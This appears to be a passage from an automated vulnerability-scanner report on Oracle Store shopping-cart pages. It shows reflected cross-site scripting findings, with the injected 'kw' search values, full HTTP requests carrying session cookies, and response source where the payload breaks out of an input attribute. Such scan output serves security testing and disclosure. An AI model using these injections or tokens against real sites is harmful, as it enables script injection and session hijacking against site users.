<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Ignorer les éléments de navigation jusqu'au contenu de la page" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10084:1298440:F"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10084:1298440:F" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Canada </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10084:1298440:F" class=OraGlobalButtonTextSelected> Chariot</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Commandes</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Profil</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Connexion</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> S'enregistrer</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Aide</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10084:1298440:F">Accueil</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> <td class="OraNav2Selected" nowrap> <a class="OraNav2Selected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10084:1298440:F">Chariot</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCScdListControl.jsp?context=CARTS&sitex=10084:1298440:F">Chariots</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCSldLists.jsp?sitex=10084:1298440:F">Listes d'achats</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCScdListControl.jsp?context=QUOTES&sitex=10084:1298440:F">Devis</a> </td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Recherche rapide </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Recherche rapide&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >Tous les produits <option value=10380>Accueil </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Mot(s) clé :</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x0010C6)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Accéder","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10084:1298440:F" target=_parent class="searchBarLink"> Recherche avancée</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Aide</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1>&l..
- /OA_HTML/ibeCScdViewA.jsp

/OA_HTML/ibeCScdViewA.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCScdViewA.jsp?sitex=10145:1298447:F&cg=-200&kw=%27%22%20ns=..

Parameters

Parameter Type Value
sitex GET 10145:1298447:F
cg GET -200
kw GET '" ns= alert(0x00129F)

Request

GET /OA_HTML/ibeCScdViewA.jsp?sitex=10145:1298447:F&cg=-200&kw=%27%22%20ns=%20netsparker(0x00129F)%20 HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCScdViewA.jsp?sitex=10145:1298447:F
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=69ed89d782620bbdede6b187e9d5f7f3fb6c63fda455dbe2a00fc245ff418c37.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZG2A046AE89DEB2CD363F9406265E9924C8193E0AA64019B62AEB774F40E7E6C1AFEB0C1793FBE86AE4BBE142D50F88AE7; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=0L4pcKo7sVqplVlYRTlIkstvnP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=69ed89d782620bbdede6b187e9d5f7f3fb6c63fda455dbe2a00fc245ff418c37.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure
Content-Length: 9549
Date: Sun, 11 Sep 2011 18:03:09 GMT
































<!-- $Header: ibeCScdViewA.jsp 120.17.12010000.6 2010/07/29 06:22:06 amaheshw ship $ --><SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"> </SCRIPT><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCScpCookie.jsp 120.0 2005/05/30 02:29:43 appldev noship $ --> <!-- ibeCScpCookie.jsp end --><!-- Util page contains helper api for Carts/Quotes--> <!-- $Header: ibeCScpQuoteUtil.jsp 120.0 2005/05/30 03:28:38 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Shopping Cart </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298367:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10062:1298367:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Australia </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10062:1298367:US" class=OraGlobalButtonTextSelected> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10062:1298367:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> <td class="OraNav2Selected" nowrap> <a class="OraNav2Selected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10062:1298367:US">Shopping Cart</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCScdListControl.jsp?context=CARTS&sitex=10062:1298367:US">Carts</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCSldLists.jsp?sitex=10062:1298367:US">Shopping Lists</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCScdListControl.jsp?context=QUOTES&sitex=10062:1298367:US">Quotes</a> </td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x00129F)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10062:1298367:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD..
- /OA_HTML/misibeCScdViewA.jsp

/OA_HTML/misibeCScdViewA.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US&cg=-200&kw=%27%22%..

Parameters

Parameter Type Value
sitex GET 10145:1298447:US
cg GET -200
kw GET '" ns= alert(0x0014F4)

Request

GET /OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US&cg=-200&kw=%27%22%20ns=%20netsparker(0x0014F4)%20 HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=c82d7518cbc1c7a0ccd4621ce37a25389c68251f5b54c6ce7195030b12c61859.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZG480B8DE0B81FF5A286CBB650C382850C157124912343B96DAA4A1B011634EB4E8E67D0281E7BD25718C0E538E99DB7DD; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=fnZ2RApjgPCFjXbHbfZfgO5Gcu
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=c82d7518cbc1c7a0ccd4621ce37a25389c68251f5b54c6ce7195030b12c61859.e34QbhaLa3mKbi0La3mQaNePax4Ne0; path=/OA_HTML; secure
Content-Length: 10205
Date: Sun, 11 Sep 2011 18:04:49 GMT
































<!-- $Header: misibeCScdViewA.jsp 120.0 2007/02/15 05:56:05 dpavani noship $ --><!-- Copy Of ibeCScdViewA.jsp 120.16 --><SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"> </SCRIPT><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCScpCookie.jsp 120.0 2005/05/30 02:29:43 appldev noship $ --> <!-- ibeCScpCookie.jsp end --><!-- Util page contains helper api for Carts/Quotes--> <!-- $Header: ibeCScpQuoteUtil.jsp 120.0 2005/05/30 03:28:38 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Shopping Cart </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) 